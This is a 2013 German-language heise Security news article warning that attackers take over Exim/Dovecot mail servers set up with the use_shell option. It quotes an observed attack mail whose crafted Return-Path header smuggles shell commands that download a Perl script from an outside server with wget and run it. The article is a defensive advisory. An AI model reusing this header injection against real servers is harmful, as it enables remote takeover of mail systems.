Angriffe auf Mail-Server Exim/Dovecot

29.07.2013 15:24 Uhr Jürgen Schmidt

Unbekannte nutzen eine verbreitete Fehlkonfiguration, um mit speziellen Mails Mail-Server zu kapern.

Das Internet Storm Center [1] berichtet über aktuelle Angriffe auf Systeme, bei denen der Mail-Server Exim den IMAP-Server Dovecot für die lokale Zustellung von Mails benutzt.

Bereits im Mai warnte heise Security vor einem verbreiteten Konfigurationsfehler [2], der dazu führt, dass eine Mail Shell-Befehle auf dem Mail-Server ausführen kann. Das ist möglich, wenn in der Exim-Konfiguration für lokale Mail-Zustellung der Parameter use_shell gesetzt ist, wie eine Zeit lang unter anderem im Dovecot-Wiki vorgeschlagen wurde. Konkret beobachtete ein Leser Mails, die mit einem speziell präparierten Return-Path eingeliefert wurden:

Return-Path: <x`wget${IFS}
  -O${IFS}/tmp/p.pl${IFS}
  x.cc.st/exim``perl${IFS}/tmp/p.pl`@blaat.com>

Der lädt ein kleines Perl-Skript nach, dass dann unter anderem einen einfachen IRC-Server startet. Wer also die Open-Source-Kombination aus Exim und Dovecot einsetzt, tut gut daran, seine Config-Files noch einmal zu checken.

Update 16:15 29.7.: Die eingeschleusten Perl-Skripte sind übrigens immer noch vom Server x.cc.st abrufbar, der laut whois in einem Rechenzentrum in Berlin beheimatet ist. Dessen Betreiber Strato wurde darauf bereits gestern über seine abuse-Mail-Adresse hingewiesen.

Update 17:00 29.7.:Strato hat den Server jetzt still gelegt.
(ju [3])

URL dieses Artikels:
https://www.heise.de/-1925552

Links in diesem Artikel:
[1] https://isc.sans.edu/diary/Dovecot++Exim+Exploit+Detects/16243
[2] https://www.heise.de/news/Vorsicht-bei-der-Kombination-von-Exim-und-Dovecot-1856489.html
[3] mailto:ju@ct.de